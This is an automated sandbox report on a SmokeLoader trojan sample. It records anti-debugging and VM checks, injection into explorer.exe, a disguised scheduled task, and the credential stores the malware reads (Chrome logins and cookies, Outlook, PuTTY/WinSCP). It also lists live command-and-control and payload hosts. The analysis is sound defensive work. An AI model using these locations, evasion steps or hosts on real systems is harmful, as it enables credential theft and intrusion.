            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D1939 wsprintfW,FindFirstFileW,lstrcmpiW,wsprintfW,wsprintfW,wsprintfW,RtlZeroMemory,lstrcat,StrToIntA,PathMatchSpecW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D1FFD FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D217C FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D1B5B GetTempPathW,lstrcatW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,wsprintfW,CreateFileW,GetFileSize,ReadFile,CloseHandle,DeleteFileW,
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeSystem information queried: ModuleInformation
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
            Source: explorer.exe, 00000006.00000000.336294695.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.322637021.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 00000006.00000000.336294695.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: explorer.exe, 00000006.00000000.332136252.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.332136252.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWtion* 6
            Source: explorer.exe, 00000006.00000000.336294695.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

            Anti Debugging:

            barindex
            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeSystem information queried: CodeIntegrityInformation
            Source: C:\Users\user\AppData\Roaming\favdejfSystem information queried: CodeIntegrityInformation
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027DCB3A IsDebuggerPresent,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_001137BC GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027DE09A RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E82304 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E81000 GetProcessHeap,RtlAllocateHeap,
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeCode function: 1_2_021ED8D7 push dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\favdejfProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00111E98 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D8D3B SetUnhandledExceptionFilter,UnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\explorer.exeFile created: favdejf.6.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 5.188.88.118 80
            Source: C:\Windows\SysWOW64\explorer.exeDomain query: rsuehfidvdkfvk.top
            Source: C:\Windows\explorer.exeDomain query: iosoftware.org
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\AppData\Roaming\favdejfSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\AppData\Roaming\favdejfSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeThread created: C:\Windows\explorer.exe EIP: 4DE1930
            Source: C:\Users\user\AppData\Roaming\favdejfThread created: unknown EIP: 4EC1930
            Source: C:\Windows\SysWOW64\explorer.exeCode function: CreateToolhelp32Snapshot,Process32First,lstrcmpi,Process32Next,CloseHandle, explorer.exe
            Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep, explorer.exe
            Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep, explorer.exe
            Source: explorer.exe, 00000006.00000000.342990113.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
            Source: explorer.exe, 00000006.00000000.312286247.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000002.562776985.0000000003050000.00000002.00020000.sdmp, explorer.exe, 00000016.00000002.562911220.0000000002ED0000.00000002.00020000.sdmp, explorer.exe, 00000017.00000002.556994442.0000000000C70000.00000002.00020000.sdmp, explorer.exe, 00000018.00000002.562677135.0000000003220000.00000002.00020000.sdmp, explorer.exe, 00000019.00000002.557849351.0000000001750000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000002.561545851.0000000003160000.00000002.00020000.sdmp, explorer.exe, 0000001B.00000002.557928064.0000000000E10000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.564628449.00000000032E0000.00000002.00020000.sdmp, explorer.exe, 0000001D.00000002.562791958.00000000032A0000.00000002.00020000.sdmp, explorer.exe, 0000001E.00000002.557784723.00000000019E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.563078612.00000000031A0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000000.314997894.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000015.00000002.562776985.0000000003050000.00000002.00020000.sdmp, explorer.exe, 00000016.00000002.562911220.0000000002ED0000.00000002.00020000.sdmp, explorer.exe, 00000017.00000002.556994442.0000000000C70000.00000002.00020000.sdmp, explorer.exe, 00000018.00000002.562677135.0000000003220000.00000002.00020000.sdmp, explorer.exe, 00000019.00000002.557849351.0000000001750000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000002.561545851.0000000003160000.00000002.00020000.sdmp, explorer.exe, 0000001B.00000002.557928064.0000000000E10000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.564628449.00000000032E0000.00000002.00020000.sdmp, explorer.exe, 0000001D.00000002.562791958.00000000032A0000.00000002.00020000.sdmp, explorer.exe, 0000001E.00000002.557784723.00000000019E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.563078612.00000000031A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.312286247.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000002.562776985.0000000003050000.00000002.00020000.sdmp, explorer.exe, 00000016.00000002.562911220.0000000002ED0000.00000002.00020000.sdmp, explorer.exe, 00000017.00000002.556994442.0000000000C70000.00000002.00020000.sdmp, explorer.exe, 00000018.00000002.562677135.0000000003220000.00000002.00020000.sdmp, explorer.exe, 00000019.00000002.557849351.0000000001750000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000002.561545851.0000000003160000.00000002.00020000.sdmp, explorer.exe, 0000001B.00000002.557928064.0000000000E10000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.564628449.00000000032E0000.00000002.00020000.sdmp, explorer.exe, 0000001D.00000002.562791958.00000000032A0000.00000002.00020000.sdmp, explorer.exe, 0000001E.00000002.557784723.00000000019E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.563078612.00000000031A0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.312286247.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000002.562776985.0000000003050000.00000002.00020000.sdmp, explorer.exe, 00000016.00000002.562911220.0000000002ED0000.00000002.00020000.sdmp, explorer.exe, 00000017.00000002.556994442.0000000000C70000.00000002.00020000.sdmp, explorer.exe, 00000018.00000002.562677135.0000000003220000.00000002.00020000.sdmp, explorer.exe, 00000019.00000002.557849351.0000000001750000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000002.561545851.0000000003160000.00000002.00020000.sdmp, explorer.exe, 0000001B.00000002.557928064.0000000000E10000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.564628449.00000000032E0000.00000002.00020000.sdmp, explorer.exe, 0000001D.00000002.562791958.00000000032A0000.00000002.00020000.sdmp, explorer.exe, 0000001E.00000002.557784723.00000000019E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.563078612.00000000031A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000000.322637021.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02ED518B cpuid
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E8227E GetSystemTimeAsFileTime,_alldiv,wsprintfA,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E82304 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

            Stealing of Sensitive Information:

            barindex
            Yara detected SmokeLoaderShow sources
            Source: Yara matchFile source: 0000000A.00000002.424469148.0000000003C21000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.345433901.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.357733391.0000000002160000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.424450951.0000000003C00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.357762865.0000000002181000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.559721619.00000000027D1000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.555611191.0000000000111000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.555126531.0000000000311000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.555346763.0000000000E91000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5056, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6052, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6908, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal

            Remote Access Functionality:

            barindex
            Yara detected SmokeLoaderShow sources
            Source: Yara matchFile source: 0000000A.00000002.424469148.0000000003C21000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.345433901.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.357733391.0000000002160000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.424450951.0000000003C00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.357762865.0000000002181000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.559721619.00000000027D1000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.555611191.0000000000111000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.555126531.0000000000311000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.555346763.0000000000E91000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5056, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6052, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6908, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsExploitation for Client Execution1Application Shimming1Application Shimming1Obfuscated Files or Information3Input Capture21File and Directory Discovery4Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsCommand and Scripting Interpreter2Create Account1Process Injection313Software Packing11Credentials in Registry1System Information Discovery17SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSSecurity Software Discovery551Distributed Component Object ModelInput Capture21Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsVirtualization/Sandbox Evasion12SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsProcess Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion12DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection313Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 524302 Sample: 1RMZ62tUAl.exe Startdate: 18/11/2021 Architecture: WINDOWS Score: 100 37 Multi AV Scanner detection for domain / URL 2->37 39 Found malware configuration 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 4 other signatures 2->43 7 1RMZ62tUAl.exe 2->7         started        10 favdejf 2->10         started        process3 signatures4 53 Detected unpacking (changes PE section rights) 7->53 55 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->55 57 Maps a DLL or memory area into another process 7->57 59 Creates a thread in another existing process (thread injection) 7->59 12 explorer.exe 3 7->12 injected 61 Multi AV Scanner detection for dropped file 10->61 63 Machine Learning detection for dropped file 10->63 65 Checks if the current machine is a virtual machine (disk enumeration) 10->65 process5 dnsIp6 33 rsuehfidvdkfvk.top 5.188.88.118, 49749, 49750, 49751 PINDC-ASRU Russian Federation 12->33 35 iosoftware.org 139.60.161.75, 80 HOSTKEY-USAUS United States 12->35 27 C:\Users\user\AppData\Roaming\favdejf, PE32 12->27 dropped 29 C:\Users\user\...\favdejf:Zone.Identifier, ASCII 12->29 dropped 67 System process connects to network (likely due to code injection or exploit) 12->67 69 Benign windows process drops PE files 12->69 71 Deletes itself after installation 12->71 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->73 17 explorer.exe 12 12->17         started        21 explorer.exe 2 12->21         started        23 explorer.exe 12->23         started        25 10 other processes 12->25 file7 signatures8 process9 dnsIp10 31 rsuehfidvdkfvk.top 17->31 45 System process connects to network (likely due to code injection or exploit) 17->45 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->47 49 Tries to steal Mail credentials (via file / registry access) 17->49 51 3 other signatures 17->51 signatures11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            1RMZ62tUAl.exe47%VirustotalBrowse
            1RMZ62tUAl.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\favdejf100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\favdejf56%ReversingLabsWin32.Trojan.Babar

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.3.1RMZ62tUAl.exe.2150000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            10.2.favdejf.2000e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.1RMZ62tUAl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            10.3.favdejf.3c00000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.1RMZ62tUAl.exe.2140e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            10.2.favdejf.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            rsuehfidvdkfvk.top2%VirustotalBrowse
            iosoftware.org11%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://rsuehfidvdkfvk.top/Mozilla/5.00%Avira URL Cloudsafe
            http://rsuehfidvdkfvk.top/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
            http://rsuehfidvdkfvk.top/0%Avira URL Cloudsafe
            http://rsuehfidvdkfvk.top/:0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            rsuehfidvdkfvk.top
            		5.188.88.118
            		truetrueunknown
            iosoftware.org
            		139.60.161.75
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://rsuehfidvdkfvk.top/true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://rsuehfidvdkfvk.top/Mozilla/5.0explorer.exe, 00000014.00000002.482205642.00000000011F0000.00000004.00000020.sdmp, explorer.exe, 00000015.00000002.561502388.0000000002BA8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000002.562589266.0000000002BD8000.00000004.00000020.sdmp, explorer.exe, 00000017.00000002.555930517.00000000007E0000.00000004.00000020.sdmp, explorer.exe, 00000018.00000000.500674063.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 00000019.00000000.505280148.0000000000EA0000.00000040.00020000.sdmp, explorer.exe, 00000019.00000002.555816764.0000000000EE8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.511253478.0000000000340000.00000040.00020000.sdmp, explorer.exe, 0000001B.00000002.555867484.0000000000760000.00000004.00000020.sdmp, explorer.exe, 0000001B.00000000.516205138.0000000000600000.00000040.00020000.sdmp, explorer.exe, 0000001D.00000000.525714592.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.555950745.0000000001376000.00000004.00000020.sdmp, explorer.exe, 0000001E.00000000.530597579.0000000001290000.00000040.00020000.sdmp, explorer.exe, 0000001F.00000002.561863769.0000000002CC8000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000000.535523393.00000000027E0000.00000040.00020000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://rsuehfidvdkfvk.top/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://rsuehfidvdkfvk.top/:explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            5.188.88.118
            		rsuehfidvdkfvk.topRussian Federation
            		34665PINDC-ASRUtrue
            139.60.161.75
            		iosoftware.orgUnited States
            		395839HOSTKEY-USAUStrue

            General Information

            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:524302
            Start date:18.11.2021
            Start time:10:42:48
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 30s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:1RMZ62tUAl.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:33
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.bank.troj.spyw.evad.winEXE@15/6@7/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 18.5% (good quality ratio 7.9%)
            • Quality average: 29.9%
            • Quality standard deviation: 36.6%
            HCA Information:
            • Successful, ratio: 82%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            Show All
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • TCP Packets have been reduced to 100
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            10:44:30Task SchedulerRun new task: Firefox Default Browser Agent 2E48D3EE74E86FF4 path: C:\Users\user\AppData\Roaming\favdejf
            10:45:15API Interceptor1x Sleep call for process: explorer.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            5.188.88.1184B32N61SUN.exeGet hashmaliciousBrowse
            • rsuehfidvdkfvk.top/
            umpa0fYSwl.exeGet hashmaliciousBrowse
            • rsuehfidvdkfvk.top/
            139.60.161.754B32N61SUN.exeGet hashmaliciousBrowse
            • iosoftware.org/system86.exe
            umpa0fYSwl.exeGet hashmaliciousBrowse
            • iosoftware.org/system86.exe
            v0VaFGKpQR.exeGet hashmaliciousBrowse
            • iosoftware.org/system86.exe
            Yob73TQCPI.exeGet hashmaliciousBrowse
            • iosoftware.org/system86.exe

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            rsuehfidvdkfvk.top4B32N61SUN.exeGet hashmaliciousBrowse
            • 5.188.88.118
            umpa0fYSwl.exeGet hashmaliciousBrowse
            • 5.188.88.118
            v0VaFGKpQR.exeGet hashmaliciousBrowse
            • 8.209.67.58
            Yob73TQCPI.exeGet hashmaliciousBrowse
            • 8.209.67.58
